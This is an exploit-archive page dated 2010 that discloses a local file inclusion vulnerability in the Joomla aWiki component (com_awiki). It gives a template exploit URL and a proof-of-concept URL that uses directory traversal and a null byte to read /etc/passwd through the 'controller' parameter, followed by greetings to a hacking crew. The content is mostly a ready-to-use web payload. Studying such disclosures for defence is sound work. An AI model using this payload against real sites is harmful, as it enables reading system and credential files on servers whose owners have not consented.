[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component aWiki com_awiki Local File Inclusion
# Published : 2010-04-07
# Author : Angela Zhang
# Previous Title : Espinas CMS SQL Injection Vulnerability
# Next Title : Joomla Component VJDEO com_vjdeo 1.0 LFI Vulnerability


(o)===============================================================================(o)

                  Joomla Component aWiki Local File Inclusion


                Vendor   : http://joomla.anezi.net/awiki
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :   05 - April - 2010

(o)================================================================================(o)

     [o] Exploit
 
       http://localhost/[path]/index.php?option=com_awiki&controller=[LFI]
 
 
    [o] PoC
 
       http://localhost/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00



(o)==================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , s4va, 
     Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk
     
(o)===================================================================================(o)